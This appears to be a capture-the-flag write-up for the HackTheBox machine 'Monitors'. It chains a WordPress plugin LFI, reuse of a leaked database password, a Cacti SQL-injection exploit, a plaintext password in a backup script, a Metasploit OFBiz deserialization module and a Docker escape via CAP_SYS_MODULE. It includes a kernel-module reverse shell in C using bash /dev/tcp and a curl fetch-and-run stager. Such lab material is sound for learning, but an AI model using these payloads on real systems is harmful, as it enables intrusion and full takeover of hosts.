Monitors - [HTB]

Cover Image for Monitors - [HTB]

Table of Contents


    Monitors is a hard linux OSCP like machine from HackTheBox where you will several web page vulnerabilities until getting user's creds. Finally, you will have to escape from a docker container, where you will have to exploit some capabilities in order to become root.


    As always, let's start finding all opened ports in the machine with nmap.

    kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt
    Nmap scan report for
    Host is up (0.048s latency).
    Not shown: 65533 closed ports
    22/tcp open  ssh
    80/tcp open  http
    # Nmap done at Sat Jul 24 13:44:49 2021 -- 1 IP address (1 host up) scanned in 55.04 seconds

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Monitors$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80
    Nmap scan report for
    Host is up (0.047s latency).
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
    |   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
    |_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Accesing to port 80 there we have a message telling us that we can not access to the web server using an IP.

    direct ip access is not allowed

    Adding the email domain monitors.htb to the /etc/hosts file we can access to the following wordpress page.


    Enumerating with wpscan we can obtain all plugins installed.

    $ wpscan --url http://monitors.htb/ -e ap,u,cb
    [i] Plugin(s) Identified:
    [+] wp-with-spritz
     | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
     | Latest Version: 1.0 (up to date)
     | Last Updated: 2015-08-20T20:15:00.000Z
     | Found By: Urls In Homepage (Passive Detection)
     | Version: 4.2.4 (80% confidence)
     | Found By: Readme - Stable Tag (Aggressive Detection)
     |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

    The plugin spritz has an LFI / RFI vulnerability.


    Thanks to the vulnerability we can obtain the users registered on the system.

    marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

    Furthermore, we can obtain the wordpress database cred and other domain.

    /** MySQL database username */
    define( 'DB_USER', 'wpadmin' );
    /** MySQL database password */
    define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
    # Default virtual host settings
    # Add monitors.htb.conf
    # Add cacti-admin.monitors.htb.conf

    Adding the domain cacti-admin.monitors.htb into the /etc/hosts we can access to the cacti login form.


    We can login as admin with the Mysql database password.

    The cacti version 1.2.12 has an associated exploit allowing us to obtain a reverse shell as the user www-data.

    kali@kali:~/Documents/HTB/Monitors$ python3 -t http://cacti-admin.monitors.htb -u admin -p 'BestAdministrator@2020!' --lhost --lport 443
    [+] Connecting to the server...
    [+] Retrieving CSRF token...
    [+] Got CSRF token: sid:ac3fbf8f5163e68c4ded3c22646f2ca5a6c3961b,1627157074
    [+] Trying to log in...
    [+] Successfully logged in!
    [+] SQL Injection:
    [+] Check your nc listener!
    kali@kali:~/Documents/HTB/Monitors$  nc -lnvp 443
    listening on [any] 8787 ...
    connect to [] from (UNKNOWN) [] 36118
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Privilege Escalation 1

    Enumerating the file system appears a cacti service file, which executes a file inside marcu's home folder.

    www-data@monitors:/$ find / -name "cacti*" 2>/dev/null
    www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service

    Reading this file we can obtain a password.

    www-data@monitors:/home/marcus/.backup$ cat /home/marcus/.backup/
    zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
    sshpass -p "${config_pass}" scp /tmp/${backup_name}${backup_name}.zip
    rm /tmp/${backup_name}.zip

    This password can be used to become become marcus, getting the user flag.

    www-data@monitors:~$ su marcus
    Password: VerticalEdge2020
    marcus@monitors:~/.backup$ id
    uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
    marcus@monitors:~$ cat user.txt

    Privilege Escalation 2

    Executing linpeas appears the port 8443 listening for localhost.

    tcp        0      0*               

    We can access to it using SSH port forwarding.

    kali@kali:~/Documents/HTB/Monitors$ ssh marcus@ -L -fN

    Accessing the port with firefox through the protocol HTTPS we get a Tomcat error, showing the Tomcat's version (9.0.31). Looking for associated vulns we can obtain a metasploit module apache_ofbiz_deserialization.

    msf6 > use exploit/linux/http/apache_ofbiz_deserialization
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set rhosts
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set payload linux/x86/shell/reverse_tcp
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lhost
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set lport 4444
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > set forceexploit true
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > show options
    Module options (exploit/linux/http/apache_ofbiz_deserialiation):
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT      8443             yes       The target port (TCP)
       SSL        true             no        Negotiate SSL/TLS for outgoing connections
       SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
       TARGETURI  /                yes       Base path
       URIPATH                     no        The URI to use for this exploit (default is random)
       VHOST                       no        HTTP server virtual host
    Payload options (linux/x86/shell/reverse_tcp):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST      yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       1   Linux Dropper
    msf6 exploit(linux/http/apache_ofbiz_deserialiation) > run
    [*] Started reverse TCP handler on 
    [*] Executing automatic check (disable AutoCheck to override)
    [!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
    [*] Executing Linux Dropper for linux/x86/shell/reverse_tcp
    [*] Using URL:
    [*] Local IP:
    [+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/RXsgDGlc${IFS};chmod${IFS}+x${IFS}/tmp/RXsgDGlc;/tmp/RXsgDGlc;rm${IFS}-f${IFS}/tmp/RXsgDGlc
    [*] Client (curl/7.64.0) requested /re6R4gMz4969w
    [*] Sending payload to (curl/7.64.0)
    [*] Command Stager progress - 103.95% done (158/152 bytes)
    [*] Sending stage (36 bytes) to
    [*] Command shell session 1 opened ( -> at 2021-07-25 18:54:45 +0200
    [*] Server stopped.
    uid=0(root) gid=0(root) groups=0(root)

    Now, we are inside a docker container with some capabilities.

    root@77ff21ad5db2:/tmp/temp# capsh --print
    capsh --print
    Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
    Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
    Securebits: 00/0x0/1'b0
     secure-noroot: no (unlocked)
     secure-no-suid-fixup: no (unlocked)
     secure-keep-caps: no (unlocked)

    Between all of them, stands out the capabilit CAP_SYS_MODULE, allowing us to become root in the machine following this post.

    Going to the point, you need to create these files. (You can download them from your kali machine)

    Note: Do not forget to change the IP for you kali's machine and the identation in the Makefile MUST be tabs.

    root@77ff21ad5db2:/tmp/temp# cat reverse-shell.c
    #include <linux/kmod.h>
    #include <linux/module.h>
    MODULE_DESCRIPTION("LKM reverse shell module");
    char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/ 0>&1", NULL};
    static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
    root@77ff21ad5db2:/tmp/temp# cat Makefile
    obj-m +=reverse-shell.o
            make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) modules
            make -C /lib/modules/4.15.0-142-generic/build M=$(PWD) clean

    Then, execute the make command in the same directory as the files are stored, obtaining the following output.

    root@77ff21ad5db2:/tmp/temp# make
    make -C /lib/modules/4.15.0-142-generic/build M=/tmp/temp modules
    make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
      CC [M]  /tmp/temp/reverse-shell.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /tmp/temp/reverse-shell.mod.o
      LD [M]  /tmp/temp/reverse-shell.ko
    make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'

    Finally, listen with nc at port 4445 and execute the final command.

    root@77ff21ad5db2:/tmp/temp# insmod reverse-shell.ko
    insmod reverse-shell.ko
    kali@kali:~/Documents/HTB/Monitors$ nc -nlvp 4445
    listening on [any] 4445 ...
    connect to [] from (UNKNOWN) [] 37878
    bash: cannot set terminal process group (-1): Inappropriate ioctl for device
    bash: no job control in this shell
    root@monitors:/# cat /root/root.txt